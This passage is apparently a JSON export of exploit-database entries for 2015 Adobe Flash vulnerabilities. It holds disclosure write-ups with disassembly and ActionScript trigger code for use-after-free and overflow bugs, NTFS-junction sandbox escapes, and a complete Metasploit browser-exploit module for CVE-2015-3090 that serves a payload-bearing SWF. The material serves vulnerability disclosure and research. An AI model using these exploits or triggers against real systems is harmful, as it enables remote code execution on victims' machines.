Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37840.zip\r\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/37840/"}, {"lastseen": "2016-02-04T06:41:05", "description": "Flash Broker-Based Sandbox Escape via Unexpected Directory Lock. CVE-2015-3083. Remote exploit for windows platform", "published": "2015-08-19T00:00:00", "type": "exploitdb", "title": "Flash Broker-Based Sandbox Escape via Unexpected Directory Lock", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3083"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37841", "href": "https://www.exploit-db.com/exploits/37841/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=279&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\nFlashBroker - Junction Check Bypass With Locked Directory IE PM Sandbox Escape\r\n\r\n1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker\r\n\r\nFlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.\r\n\r\nThere is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker uses CreateFile to open the destination folder for check. If CreateFile fails, the destination will be considered as a valid path. However, FlashBroker uses dwShareMode as 0 in CreateFile, which make CreateFile always fail if handle of the destination folder is held by other.\r\n\r\nThe PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.\r\n\r\n2. Credit\r\nJietao Yang and Jihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.\r\n\r\nProof of Concept:\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37841.zip\r\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/37841/"}, {"lastseen": "2016-02-04T06:41:37", "description": "Flash Uninitialized Stack Variable MPD Parsing Memory Corruption. CVE-2015-3089. Dos exploit for windows platform", "published": "2015-08-19T00:00:00", "type": "exploitdb", "title": "Flash Uninitialized Stack Variable MPD Parsing Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3089"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37845", "href": "https://www.exploit-db.com/exploits/37845/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=316&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=472201]\r\n\r\nCredit is to bilou, working with the Chromium Vulnerability Rewards Program.\r\n\r\n---\r\nVULNERABILITY DETAILS\r\nLoading a weird MPD file can corrupt flash player's memory.\r\n\r\nVERSION\r\nChrome version 41.0.2272.101, Flash 17.0.0.134\r\nOperating System: Win 7 x64 SP1\r\n\r\nREPRODUCTION CASE\r\nI'm ripping most of this from scarybeasts' sources. I'm sure he's ok with that =D.\r\n\r\n\"To reproduce, host the attached SWF and other files on a web server (e.g. localhost) and load it like this:\"\r\n\r\n\"http://localhost/PlayManifest.swf?file=gen.mpd\r\n\r\n\"To compile the .as file, I had to use special flags to flex:\"\r\n\r\n\"mxmlc -target-player 14.0 -swf-version 25 -static-link-runtime-shared-libraries ./PlayManifest.as\"\r\n\"(This also requires that you have v14.0 of playerglobals.swc installed. Any newer version should also be fine.)\"\r\n\r\n\r\nOn Win7 x64 sp1 with Chrome 32 bit, crash like this:\r\n6AA8B67C | 8B C3 | mov eax,ebx |\r\n6AA8B67E | E8 A1 05 00 00 | call pepflashplayer.6AA8BC24 |\r\n6AA8B683 | EB A8 | jmp pepflashplayer.6AA8B62D |\r\n6AA8B685 | 89 88 D0 00 00 00 | mov dword ptr ds:[eax+D0],ecx | // crash here, eax points somewhere in pepflashplayer.dll\r\n6AA8B68B | 8B 88 88 00 00 00 | mov ecx,dword ptr ds:[eax+88] |\r\n6AA8B691 | 33 D2 | xor edx,edx |\r\n6AA8B693 | 3B CA | cmp ecx,edx |\r\n6AA8B695 | 74 07 | je pepflashplayer.6AA8B69E |\r\n6AA8B697 | 39 11 | cmp dword ptr ds:[ecx],edx |\r\n6AA8B699 | 0F 95 C1 | setne cl |\r\n\r\n\r\nAt first sight this looks to be an uninitialized stack variable but I might be wrong.\r\n---\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37845.zip\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37845/"}, {"lastseen": "2016-02-04T06:42:42", "description": "Flash AS2 Use After Free in DisplacementMapFilter.mapBitmap. CVE-2015-3080. Dos exploit for windows platform", "published": "2015-08-19T00:00:00", "type": "exploitdb", "title": "Flash AS2 Use After Free in DisplacementMapFilter.mapBitmap", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3080"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37853", "href": "https://www.exploit-db.com/exploits/37853/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=358&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\n[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=457680]\r\n\r\n---\r\nVULNERABILITY DETAILS\r\nThere is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. \r\n\r\nVERSION\r\nChrome Version: 40.0.2214.111 stable, Flash 16.0.0.305\r\nOperating System: Win7 SP1 x64]\r\n\r\nThe AS2 mapBitmap_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).\r\nJust put mapBitmap_as2.swf in a browsable directory and run the swf with Chrome. It should crash while dereferencing 0x41424344.\r\n\r\n\r\nHere are a few steps to trigger the issue:\r\n\r\n1) Create a BitmapData and store it somewhere, for example as a static member of a custom class.\r\n2) Create a second BitmapData and use it to create a DisplacementMapFilter. We don't care about this BitmapData, it is just needed to create the filter.\r\n3) Override the BitmapData constructor with a custom class. That class should put the first BitmapData on top of the AS2 stack when the constructor returns.\r\n4) Create an object o and change its valueOf method so that it points to a function that calls the DisplacementMapFilter.mapBitmap property.\r\n5) Use the first BitmapData and call getPixel32(o).\r\n\r\nWhat happens during step 5? Flash caches first the BitmapData in the stack before calling o.valueOf. At that moment the BitmapData isn't used elsewhere so its refcount equals 1. Flash enters then o.valueOf which leads to get the mapBitmap property. At that moment we hit the following lines, in sub_10193F2D:\r\n\r\nCPU Disasm\r\nAddress Hex dump Command \r\n6D2D3FBB 68 BE27C66D PUSH OFFSET 6DC627BE\r\n6D2D3FC0 FF73 04 PUSH DWORD PTR DS:[EBX+4]\r\n6D2D3FC3 56 PUSH ESI\r\n6D2D3FC4 8B33 MOV ESI,DWORD PTR DS:[EBX]\r\n6D2D3FC6 E8 A572F8FF CALL 6D25B270 ; that function creates a new atom and calls the BitmapData constructor\r\n6D2D3FCB 84C0 TEST AL,AL\r\n6D2D3FCD 74 09 JE SHORT 6D2D3FD8\r\n6D2D3FCF 8B0B MOV ECX,DWORD PTR DS:[EBX]\r\n6D2D3FD1 6A 01 PUSH 1 \r\n6D2D3FD3 E8 281A0100 CALL 6D2E5A00 ; if the constructor is overriden by a custom class, the custom constructor is called here\r\n6D2D3FD8 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]\r\n6D2D3FDB 8B13 MOV EDX,DWORD PTR DS:[EBX]\r\n6D2D3FDD 56 PUSH ESI\r\n6D2D3FDE E8 418EF6FF CALL 6D23CE24 ; then pop the new atom from the AS2 stack\r\n...\r\n6D2D4000 23F8 AND EDI,EAX\r\n6D2D4002 807F 35 1B CMP BYTE PTR DS:[EDI+35],1B ; and ensure this is indeed a BitmapData\r\n6D2D4006 74 0A JE SHORT 6D2D4012\r\n...\r\n\r\nIn the next lines Flash does two things. It destroys the BitmapData object associated to the BitmapData atom and replaces it with the one defined in the DisplacementMapFilter:\r\n\r\n6D2D4012 8B47 28 MOV EAX,DWORD PTR DS:[EDI+28]\r\n6D2D4015 83E0 FE AND EAX,FFFFFFFE\r\n6D2D4018 8B40 18 MOV EAX,DWORD PTR DS:[EAX+18] ; get the BitmapData object \r\n6D2D401B 33C9 XOR ECX,ECX\r\n6D2D401D 51 PUSH ECX\r\n6D2D401E E8 1DB2FEFF CALL 6D2BF240 ; call the BitmapData destructor\r\n6D2D4023 8B75 10 MOV ESI,DWORD PTR SS:[EBP+10]\r\n6D2D4026 8BC7 MOV EAX,EDI\r\n6D2D4028 E8 134AF6FF CALL 6D238A40 ; and associate the DisplacementMapFilter.mapBitmap object\r\n\r\n\r\nAll of this works as long as the BitmapData object read from the AS2 stack is not in use somewhere. But since we can provide our own constructor, we can do anything with the AS2 stack, including having an in use BitmapData at the top of the stack when the constructor returns. This can be done by manipulating the AS2 byte code of the constructor for example. So if the returned BitmapData has a refcounter set to 1, Flash frees the object and we end up with a garbage reference in the stack which crashes the player in BitmapData.getPixel32.\r\n\r\nAfter compiling mapBitmap_as2.swf, I had to change the bytes at offset 0x90F in the (MyBitmapData constructor):\r\n52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)\r\n\r\nHopefully if it works we should crash here with eax controlled:\r\nCPU Disasm\r\nAddress Hex dump Command\r\n6D2BFA83 3B58 0C CMP EBX,DWORD PTR DS:[EAX+0C] //eax = 0x41424344\r\n6D2BFA86 7D 57 JGE SHORT 6D2BFADF\r\n6D2BFA88 85FF TEST EDI,EDI\r\n6D2BFA8A 78 53 JS SHORT 6D2BFADF\r\n6D2BFA8C 3B78 08 CMP EDI,DWORD PTR DS:[EAX+8]\r\n6D2BFA8F 7D 4E JGE SHORT 6D2BFADF\r\n6D2BFA91 8BC8 MOV ECX,EAX\r\n6D2BFA93 8B01 MOV EAX,DWORD PTR DS:[ECX]\r\n6D2BFA95 8B50 10 MOV EDX,DWORD PTR DS:[EAX+10]\r\n6D2BFA98 FFD2 CALL EDX\r\n\r\nI don't kwow if we can abuse ASLR with that. If we can do something without getting a virtual function dereferenced, it must be possible.\r\n\r\n\r\n***************************************************************************\r\nContent of MyBitmapData.as\r\n\r\nclass MyBitmapData extends String\r\n{\r\n\tstatic var mf;\r\n\tfunction MyBitmapData()\r\n\t{\r\n\t\tsuper();\r\n var a = MyBitmapData.mf\r\n test(a,a,a,a,a,a,a,a) //that part should be deleted manually in the bytecode\r\n trace(a) //so that MyBitmapData.mf stays on top of the AS2 stack\r\n\t}\r\n\tpublic function test(a,b,c,d,e,f,g,h) {\r\n \r\n }\r\n\tstatic function setBitmapData(myfilter)\r\n\t{\r\n\t\tmf = myfilter;\r\n\t}\r\n}\r\n\r\n***************************************************************************\r\nContent of mapBitmap_as2.fla\r\n\r\nimport flash.filters.DisplacementMapFilter;\r\nimport flash.display.BitmapData;\r\n\r\nvar bd:BitmapData = new BitmapData(10,10)\r\nMyBitmapData.setBitmapData(bd)\r\nvar bd2:BitmapData = new BitmapData(10,10)\r\nvar dmf:DisplacementMapFilter = new DisplacementMapFilter(bd2,new flash.geom.Point(1,2),1,2,3,4)\r\n\r\nnewConstr = MyBitmapData\r\nflash.display.BitmapData = newConstr\r\n\r\nfunction f() {\r\n\tvar a = dmf.mapBitmap;\r\n}\r\nvar a:Array = new Array()\r\nvar b:Array = new Array()\r\nfor (var i = 0; i<0xC8/4;i++) {\r\n\tb[i] = 0x41424344\r\n}\r\n\r\nvar o = new Object()\r\no.valueOf = function () {\r\n\tf()\r\n\tfor (var i = 0; i<0x10;i++) {\r\n\t\tvar tf:TextFormat = new TextFormat()\r\n\t\ttf.tabStops = b\r\n\t\ta[i] = tf\r\n\t}\r\n\treturn 4\r\n}\r\n\r\nbd.getPixel32(o,4)\r\n---\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37853.zip\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37853/"}, {"lastseen": "2016-02-04T06:41:12", "description": "Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving. CVE-2015-3081. Remote exploit for windows platform", "published": "2015-08-19T00:00:00", "type": "exploitdb", "title": "Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3081"], "modified": "2015-08-19T00:00:00", "id": "EDB-ID:37842", "href": "https://www.exploit-db.com/exploits/37842/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=280&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n\r\nFlashBroker - BrokerMoveFileEx TOCTOU IE PM Sandbox Escape\r\n\r\n1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker\r\n\r\nFlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.\r\n\r\nThere is a race condition in FlashBroker BrokerMoveFileEx method. This race can be won by using an oplock to wait for the point where the BrokerMoveFileEx method opens the original file and then making destination to be a junction.\r\n\r\nThe PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 (KB3021953) installed. It does not work in IE11 EPM as it needs to write normally to the temporary folder to setup the junction.\r\n\r\n2. Credit\r\nJihui Lu of KeenTeam (@K33nTeam) is credited for the vulnerability.\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37842.zip", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37842/"}], "zdt": [{"lastseen": "2018-01-09T04:17:43", "edition": 2, "description": "Exploit for windows platform in category dos / poc", "published": "2015-08-19T00:00:00", "type": "zdt", "title": "Flash Player Integer Overflow in Function.apply Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3087"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24085", "href": "https://0day.today/exploit/description/24085", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=302&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470837]\r\n \r\nVULNERABILITY DETAILS\r\nAn integer overflow while calling Function.apply can lead to enter an ActionScript function without correctly validating the supplied arguments.\r\n \r\nVERSION\r\nChrome Version: 41.0.2272.101 stable, Flash 17.0.0.134\r\nOperating System: Win7 x64 SP1\r\n \r\nREPRODUCTION CASE\r\n \r\nFrom exec.cpp taken from the Crossbridge sources, available at https://github.com/adobe-flash/crossbridge/blob/master/avmplus/core/exec.cpp\r\n \r\n944 // Specialized to be called from Function.apply(). \r\n945 Atom BaseExecMgr::apply(MethodEnv* env, Atom thisArg, ArrayObject *a) \r\n946 { \r\n947 int32_t argc = a->getLength(); \r\n \r\n...\r\n \r\n966 // Tail call inhibited by local allocation/deallocation. \r\n967 MMgc::GC::AllocaAutoPtr _atomv; \r\n968 Atom* atomv = (Atom*)avmStackAllocArray(core, _atomv, (argc+1), sizeof(Atom)); //here if argc = 0xFFFFFFFF we get an integer overflow\r\n969 atomv[0] = thisArg; \r\n970 for (int32_t i=0 ; i < argc ; i++ ) \r\n971 atomv[i+1] = a->getUintProperty(i); \r\n972 return env->coerceEnter(argc, atomv); \r\n973 } \r\n \r\n \r\nSo the idea is to use the rest argument to get a working poc. For example:\r\n \r\n public function myFunc(a0:ByteArray, a1:ByteArray, a2:ByteArray, a3:ByteArray, a4:ByteArray, a5:ByteArray, ... rest) {\r\n \r\n try {a0.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a1.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a2.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a3.writeUnsignedInt(0x41414141)}catch (e) {}\r\n try {a4.writeUnsignedInt(0x41414141)}catch (e) {}\r\n \r\n }\r\n public function XApplyPoc() {\r\n var a:Array = new Array()\r\n \r\n a.length = 0xFFFFFFFF\r\n myFunc.apply(this, a)\r\n }\r\n \r\nCompile with mxmlc -target-player 15.0 -swf-version 25 XApplyPoc.as.\r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37843.zip\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24085"}, {"lastseen": "2018-03-20T01:18:09", "description": "This Metasploit module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute of the ShaderJob after starting the job it's possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled.", "edition": 2, "published": "2015-06-20T00:00:00", "type": "zdt", "title": "Adobe Flash Player ShaderJob Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3090"], "modified": "2015-06-20T00:00:00", "id": "1337DAY-ID-23766", "href": "https://0day.today/exploit/description/23766", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow vulnerability related to the ShaderJob workings on\r\n Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the\r\n same Bitmap object as src and destination of the ShaderJob. Modifying the \"width\" attribute\r\n of the ShaderJob after starting the job it's possible to create a buffer overflow condition\r\n where the size of the destination buffer and the length of the copy are controlled. This\r\n module has been tested successfully on:\r\n * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.\r\n * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.\r\n * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.\r\n * Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Chris Evans', # Vulnerability discovery\r\n 'Unknown', # Exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-3090'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],\r\n ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'May 12 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n\r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\nend\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23766"}, {"lastseen": "2018-03-13T23:14:09", "edition": 2, "description": "Exploit for windows platform in category dos / poc", "published": "2015-08-19T00:00:00", "type": "zdt", "title": "Flash AVSS.setSubscribedTags Use After Free Memory Corruption Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3088"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24084", "href": "https://0day.today/exploit/description/24084", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=303&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\n[Tracking for: https://code.google.com/p/chromium/issues/detail?id=470864]\r\n \r\nVULNERABILITY DETAILS\r\nUse After Free in Flash AVSS.setSubscribedTags, setCuePointTags and setSubscribedTagsForBackgroundManifest can be abused to write pointers to String to freed locations.\r\n \r\nVERSION\r\nChrome Version: 41.0.2272.101 stable, Flash 17.0.0.134\r\nOperating System: Win7 x64 SP1\r\n \r\nREPRODUCTION CASE\r\nUse After Free vulnerability in AVSS.setSubscribedTags can cause arbitrary code execution.\r\npepflashplayer.dll 17.0.0.134, based at 0x10000000.\r\n \r\nThe setSubscribedTags is handled by sub_103255AD:\r\n \r\n.text:103255AD push ebp\r\n.text:103255AE mov ebp, esp\r\n.text:103255B0 and esp, 0FFFFFFF8h\r\n.text:103255B3 sub esp, 14h\r\n.text:103255B6 push ebx\r\n.text:103255B7 mov ebx, [ebp+arg_0]\r\n.text:103255BA push esi\r\n.text:103255BB push edi\r\n.text:103255BC mov edi, eax\r\n.text:103255BE mov eax, [ebx]\r\n.text:103255C0 mov ecx, ebx\r\n.text:103255C2 call dword ptr [eax+8Ch] ; first get the length of the provided array\r\n.text:103255C8 lea esi, [edi+4Ch]\r\n.text:103255CB mov [esp+20h+var_C], eax\r\n.text:103255CF call sub_103265BB\r\n.text:103255D4 mov esi, [esp+20h+var_C]\r\n.text:103255D8 test esi, esi\r\n.text:103255DA jz loc_1032566D\r\n.text:103255E0 xor ecx, ecx\r\n.text:103255E2 push 4\r\n.text:103255E4 pop edx\r\n.text:103255E5 mov eax, esi\r\n.text:103255E7 mul edx\r\n.text:103255E9 seto cl\r\n.text:103255EC mov [edi+58h], esi\r\n.text:103255EF neg ecx\r\n.text:103255F1 or ecx, eax\r\n.text:103255F3 push ecx\r\n.text:103255F4 call unknown_libname_129 ; and then allocate an array of 4*length\r\n.text:103255F9 and [esp+24h+var_10], 0\r\n.text:103255FE pop ecx\r\n.text:103255FF mov [edi+54h], eax ; that pointer is put at offset 0x54 in the object pointed by edi\r\n \r\n \r\nNext there is a for loop that iterates over the array items and calls the toString() method of each item encountered:\r\n \r\n.text:10325606 loc_10325606:\r\n.text:10325606 mov eax, [edi+8]\r\n.text:10325609 mov eax, [eax+14h]\r\n.text:1032560C mov esi, [eax+4]\r\n.text:1032560F push [esp+20h+var_10]\r\n.text:10325613 mov eax, [ebx]\r\n.text:10325615 mov ecx, ebx\r\n.text:10325617 call dword ptr [eax+3Ch] ; get the ith element\r\n.text:1032561A push eax\r\n.text:1032561B mov ecx, esi\r\n.text:1032561D call sub_1007205D ; call element->toString()\r\n.text:10325622 lea ecx, [esp+20h+var_8]\r\n.text:10325626 push ecx\r\n.text:10325627 call sub_10061703\r\n.text:1032562C mov eax, [esp+20h+var_4]\r\n.text:10325630 inc eax\r\n.text:10325631 push eax\r\n.text:10325632 call unknown_libname_129\r\n.text:10325637 mov edx, [edi+54h]\r\n.text:1032563A pop ecx\r\n.text:1032563B mov ecx, [esp+20h+var_10]\r\n.text:1032563F mov [edx+ecx*4], eax ; write a pointer to the string in the array\r\n...\r\n.text:1032565F inc [esp+20h+var_10]\r\n.text:10325663 mov eax, [esp+20h+var_10]\r\n.text:10325667 cmp eax, [esp+20h+var_C]\r\n.text:1032566B jl short loc_10325606\r\n \r\n \r\nThe issue can be triggered as follows. Register an object with a custom toString method in an array and call AVSS.setSubscribedTags(array). When object.toString() is called, call again AVSS.setSubscribedTags with a smaller array. This results in freeing the first buffer. So when the execution flow returns to AVSS.setSubscribedTags a UAF occurs allowing an attacker to write a pointer to a string somewhere in memory.\r\n \r\nTrigger with that:\r\n \r\n var avss:flash.media.AVSegmentedSource = new flash.media.AVSegmentedSource ();\r\n \r\n var o:Object = new Object();\r\n o.toString = function():String {\r\n var a = [0,1,2,3];\r\n avss.setSubscribedTags(a);\r\n return \"ahahahahah\"\r\n };\r\n \r\n var a = [o,1,2,3,4,5,6,7,8,9];\r\n var i:uint = 0;\r\n while (i < 0x100000) {\r\n i++;\r\n a.push(i);\r\n }\r\n avss.setSubscribedTags(a);\r\n \r\nNote: AVSS.setCuePointTags and AVSS.setSubscribedTagsForBackgroundManifest are vulnerable as well, see XAVSSArrayPoc2.swf and XAVSSArrayPoc3.swf.\r\n \r\nCompile with mxmlc -target-player 15.0 -swf-version 25 XAVSSArrayPoc.as.\r\n \r\nMy mistake, not a UAF but instead a heap overflow. We allocate first 4*0x100000 bytes, then free that buffer, then reallocate 4*4 bytes, then write 0x100000 pointers to a buffer of size 0x10.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37844.zip\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24084"}, {"lastseen": "2018-03-19T13:17:47", "edition": 2, "description": "Exploit for windows platform in category remote exploits", "published": "2015-08-19T00:00:00", "type": "zdt", "title": "Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3082"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24089", "href": "https://0day.today/exploit/description/24089", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=278&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\nFlashBroker - Junction Check Bypass With Forward Slash IE PM Sandbox Escape\r\n \r\n1. Windows 8.1 Internet Explorer Protected Mode Bypass in FlashBroker\r\n \r\nFlashBroker is vulnerable to NTFS junction attack to write an arbitrary file to the filesystem under user permissions.\r\n \r\nThere is a bad check in FlashBroker BrokerCreateFile method and BrokerMoveFileEx method. FlashBroker only considers \"\\\" as delimiter. If the destination includes \"/\", FlashBroker will use a wrong destination folder for check.\r\n \r\nThe PoC writes calc.bat to startup folder. It has been tested by injecting the dll into 32-bit low integrity level IE process with Adobe Flash Player 16.0.0.305 